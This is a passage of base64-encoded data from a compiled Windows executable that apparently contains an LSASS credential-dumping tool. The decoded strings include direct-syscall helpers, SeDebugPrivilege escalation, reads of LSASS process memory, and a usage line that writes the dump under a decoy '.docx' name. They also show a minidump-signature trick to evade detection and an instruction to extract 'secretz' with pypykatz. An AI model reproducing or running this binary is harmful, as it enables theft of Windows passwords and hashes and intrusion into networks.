AEiYSAHDSQHGgHv/AA+EhgAAAEiDxgJMOfV2bQ+3FkWJ6UGJ+EiJ2eis/v//hcB/0EnHxv////9MifBIg8QwW15fXUFcQV1BXsMPH4AAAAAASI1sJCvrF5BIY9CD6AFImEkB1oB8BCsAdD5Ig8YCD7cWRYnpQYn4SInp6Fn+//+FwH/V66sPHwBJiTQk66lmLg8fhAAAAAAASccEJAAAAABJg+4B65FmkEmD7gHriZCQkJCQkJCQkJBTSIPsIInL6EQBAACJ2UiNFElIweIESAHQSIPEIFvDkEiLBVl1AADDDx+EAAAAAABIichIhwVGdQAAw5CQkJCQU0iD7CBIicsxyeix////SDnDcg+5EwAAAOii////SDnDdhVIjUswSIPEIFtI/yX1ewAADx9EAAAxyeiB////SYnASInYTCnASMH4BGnAq6qqqo1IEOiuAAAAgUsYAIAAAEiDxCBbw2YPH4QAAAAAAFNIg+wgSInLMcnoQf///0g5w3IPuRMAAADoMv///0g5w3YVSI1LMEiDxCBbSP8lxXsAAA8fRAAAgWMY/3///zHJ6Ar///9IKcNIwfsEadurqqqqjUsQSIPEIFvpMAAAAEiLBbk4AABIiwDDkJCQkJBIiwW5OAAASIsAw5CQkJCQSIsFuTgAAEiLAMOQkJCQkP8lQnwAAJCQ/yUifAAAkJD/JcJ7AACQkP8lonsAAJCQ/yWSewAAkJAPH4QAAAAAAP8l2noAAJCQDx+EAAAAAAD/JVp7AACQkP8lSnsAAJCQ/yU6ewAAkJD/JSp7AACQkP8lGnsAAJCQ/yUKewAAkJD/Jfp6AACQkP8l6noAAJCQ/yXaegAAkJD/Jcp6AACQkP8lunoAAJCQ/yWqegAAkJD/JZp6AACQkP8linoAAJCQ/yV6egAAkJD/JWp6AACQkP8lWnoAAJCQDx+EAAAAAADp+2z//5CQkJCQkJCQkJCQ//////////8gqEAAAAAAAAAAAAAAAAAA//////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFCoQAAAAAAAAAAAAAAAAAD//////////wAAAAAAAAAA/wAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAD/////AAAAAAAAAAAAAAAAQAAAAMO////APwAAAQAAAAAAAAAOAAAAAAAAAAAAAADAEUEAAAAAAAAAAAAAAAAAEKZAAAAAAAAAAAAAAAAA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